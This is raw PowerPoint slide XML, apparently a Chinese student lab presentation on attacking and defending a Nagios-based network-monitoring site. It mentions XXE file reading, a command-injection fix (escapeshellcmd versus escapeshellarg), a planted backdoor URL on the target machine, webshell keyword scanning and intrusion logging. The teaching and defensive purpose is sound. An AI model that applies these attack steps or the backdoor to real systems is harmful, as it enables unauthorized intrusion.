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6" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId57"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="312" r:id="rId3"/>
    <p:sldId id="314" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="315" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="313" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="290" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="274"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1" r:id="rId36"/>
    <p:sldId id="306" r:id="rId37"/>
    <p:sldId id="307"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8" r:id="rId53"/>
    <p:sldId id="309" r:id="rId54"/>
    <p:sldId id="310" r:id="rId55"/>
    <p:sldId id="311"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用户" initials="Office" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="" providerId=""/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Microsoft Office 用户" initials="Office [2]" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="" providerI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38" autoAdjust="0"/>
    <p:restoredTop sz="92751"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="101" d="100"/>
          <a:sy n="101" d="100"/>
        </p:scale>
        <p:origin x="216"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commentAuthors" Target="commentAuthors.xml"/><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6A8523-4798-054F-A5F4-0983B2DD2021}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2018/7/13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72B5BF-0CB2-FB49-9245-5E91D9A9A863}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1386772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说明我们的请求导致了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>403</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错误（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>403</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错误：表示资源不可用。服务器理解客户的请求，但拒绝处理它，通常由于服务器上文件或目录的权限设置导致的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>访问错误），攻击不成功。但是此项防护措施对利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞进行的攻击无效</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="幻灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D672B5BF-0CB2-FB49-9245-5E91D9A9A863}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="840512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AIDE(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Adevanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Intrusion Detection Environment,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>高级入侵检测环境</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是个入侵检测工具，主要用途是检查文本的完整性。</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D672B5BF-0CB2-FB49-9245-5E91D9A9A863}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347485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DDA51639-B2D6-4652-B8C3-1B4C224A7BAF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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05266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zh-CN" altLang="en-US"/>
              <a:t>单击图标添加图片</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BC48EC7-AF6A-48D3-8284-14BACBEBDD84}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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9958915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BC48EC7-AF6A-48D3-8284-14BACBEBDD84}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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8550594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BC48EC7-AF6A-48D3-8284-14BACBEBDD84}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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2149688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BC48EC7-AF6A-48D3-8284-14BACBEBDD84}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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5996557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3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CBC48EC7-AF6A-48D3-8284-14BACBEBDD84}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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05946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zh-CN" altLang="en-US"/>
              <a:t>单击图标添加图片</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zh-CN" altLang="en-US"/>
              <a:t>单击图标添加图片</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zh-CN" altLang="en-US"/>
              <a:t>单击图标添加图片</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3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CBC48EC7-AF6A-48D3-8284-14BACBEBDD84}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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0474435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smtClean="0"/>
              <a:t>7/13/18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64401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smtClean="0"/>
              <a:t>7/13/18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92992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2FF5DD9-2C52-442D-92E2-8072C0C3D7CD}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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33695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44961B7-6B89-48AB-966F-622E2788EECC}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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50793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smtClean="0"/>
              <a:t>7/13/18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64701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141410" y="3073397"/>
            <a:ext cx="4878391" cy="271780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3073397"/>
            <a:ext cx="4875210" cy="271780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smtClean="0"/>
              <a:t>7/13/18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76217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smtClean="0"/>
              <a:t>7/13/18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58315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smtClean="0"/>
              <a:t>7/13/18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3338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1CF131DD-A141-4471-BCF9-C6073EDD7E20}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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85151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AB334A90-EB03-42F3-8859-2C2B2724C058}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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8391877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BC48EC7-AF6A-48D3-8284-14BACBEBDD84}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/13/18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6399237"/>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file://&#21487;&#20197;&#35835;&#21462;&#26381;&#21153;&#22120;&#31471;&#30340;&#20219;&#24847;&#25991;&#2021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 Id="rId3"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png"/><Relationship Id="rId3"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4.xml"/><Relationship Id="rId2"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5.png"/><Relationship Id="rId3"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7.png"/><Relationship Id="rId3"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4.xml"/><Relationship Id="rId2"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4.xml"/><Relationship Id="rId2"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7.png"/><Relationship Id="rId3"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9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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hyperlink" Target="http://www.nagios.or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hyperlink" Target="http://&#38774;&#26426;ip/Nagios/Nagios-backdoor.ph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60E164C-E163-409D-8C4A-08A68A0948CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1603514" y="1122363"/>
            <a:ext cx="9064486" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>企业级网络监控服务网站的攻击与防护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3A128FBA-5DD8-497E-85D5-FF07B8136A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>刘怡萍 杨静敏 闫馨心 窦悦嘉 王梦媛 贺弋玲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28722795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E5234EE-D3B6-4356-8093-C496B07EBB8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E84F347F-F79E-413E-9A58-10A3E363AA52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544893" y="2594401"/>
            <a:ext cx="8003120" cy="3960549"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{345700EE-9D95-4474-B224-452D8BC5915D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258957" y="1948070"/>
            <a:ext cx="9788454" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将常见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中出现的关键字做成字典，通过脚本对指定文件的内容进行扫描，检测出潜在的后门文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="871156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C35ED9A-A2B9-4F6D-8034-6659A93FFAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防御过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AD567218-999B-4052-BE17-E8968E32897B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有如下几种防御方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将导致漏洞的函数由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>escapeshellcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>escapeshellarg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rss-newsfeed.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rss-corefeed.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编写检测脚本进行检测，并屏蔽恶意连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用最后一种进行检测防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30693621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C1A55EC-C938-490D-AB73-52318D065629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编写检测脚本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A543E7CB-CD6A-4F4B-8424-25CCEB327F71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建一个叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>check.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编写检测脚本，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设定需要保护的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，这里只有服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{50296257-DD5A-4BAE-B888-0C2370AEE1EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094410" y="2249487"/>
            <a:ext cx="3659189" cy="366878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B7ED3C5F-5F88-4557-BD00-CE871BA5B1AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1402259" y="3429000"/>
            <a:ext cx="5570855" cy="2209165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34532039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DD7835E-2EA5-4B79-9DC0-254AE463D0FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵检测过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{779B9603-4832-4A5E-81DE-DDD3AD2FD694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141411" y="2249487"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>开始运行脚本，使靶机实时处在检测入侵状态</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>利用攻击机开始获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的攻击，结束后查看保存的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件，发现可以看到入侵的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看恶意的入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>得到如下信息，可以看到其他入侵的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{71E89083-8572-459D-AF57-E3F43FC9E202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4187687" y="3994606"/>
            <a:ext cx="4108173" cy="304718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
